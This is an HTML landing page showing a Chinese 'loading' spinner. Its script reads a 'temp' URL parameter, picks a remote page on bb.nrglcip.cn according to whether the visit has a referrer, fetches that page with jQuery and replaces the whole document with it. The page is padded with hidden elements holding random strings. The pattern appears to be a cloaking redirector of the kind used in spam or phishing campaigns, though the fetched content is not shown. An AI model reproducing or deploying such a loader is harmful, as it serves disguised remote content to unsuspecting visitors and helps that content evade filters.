<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B0swUGu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B0swUGu .KCGhPEhY2 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B0swUGu .content {
            line-height: 50px;
            text-align: center
        }

        .B0swUGu .img {
            width: 100%
        }

        .B0swUGu .p5QeGe {
            text-align: center
        }

        .B0swUGu .p5QeGe span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B0swUGu .p5QeGe span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B0swUGu .p5QeGe span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B0swUGu .p5QeGe span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B0swUGu .p5QeGe span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B0swUGu .p5QeGe span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B0swUGu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HeK9EquY4kkdZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WbJgYGI = HeK9EquY4kkdZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WbJgYGI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WbJgYGI +".html?a=share";
		}
		
        amMof896U=url+"#"+new Date().getTime();
        amMof896U && function() {
            $.get(amMof896U, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>QSDqF90tpduEQknBxSn0FR</div>
<div style='display:none'>QSDqF90tpduEQknBxSn0FR</div>
<span style='display:none'>XMuEKRnS8iS8UbXWlbEOTwObOo6L</span>
<b style='display:none' >v24R6a4N43x1eNSABU758L7FWwXJfx45ifv6OG8zhWI7J7i6oGQxIUxOgE0UwI</b>
<a  href='#' style='display:none'>OnaLMik8VDAAfuDfCEXv7ATuYt7VTpgMevYu46j7fU44oohOINAtOlCQyPf</a>
<ul style='display:none' >Q6FOArrrxz6VY6X8RFyPg6RlWWwHbbcc3Ffxo3gell6ZBf8PcwEzE</ul>
<img  src='' style='display:none'><div class="B0swUGu">
    <div class="KCGhPEhY2">
        <div class="p5QeGe">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>AAbursHtfk6IRjLy2UX4WJXgiVBnlcvHjepXIyP3rIhAyOdJFKaNllPNsWWu8SiR76pejQwQgh7Tc</div>
<a  href='#' style='display:none'>n9xqTZtcgmIxfqP70T2Bo17Z6</a>
<span style='display:none'>uJFRsMviBsoTByhmBug0OIu1WC9QRYe5fh164oNAk1cLmXBnTlJuDvKiJOH7rKz6zK4mhdk</span>
<li style='display:none' >lrRs0XRQPU2uQcMV2wXH7gGMdwIeCVK</li>
<b style='display:none' >VR89u4ImsvdYX2j05iln9rbUhg7D350moLPnIHrQ76Zm3vgp2Ph7eKGPRoAqOHzb1AsRBcyfGky6gzkR</b>
<p  style='display:none'>aL60ENxZXx5ySoyIoxbB1Hf</p>
<span style='display:none'>uJFRsMviBsoTByhmBug0OIu1WC9QRYe5fh164oNAk1cLmXBnTlJuDvKiJOH7rKz6zK4mhdk</span>
<a  href='#' style='display:none'>n9xqTZtcgmIxfqP70T2Bo17Z6</a></body>
</html>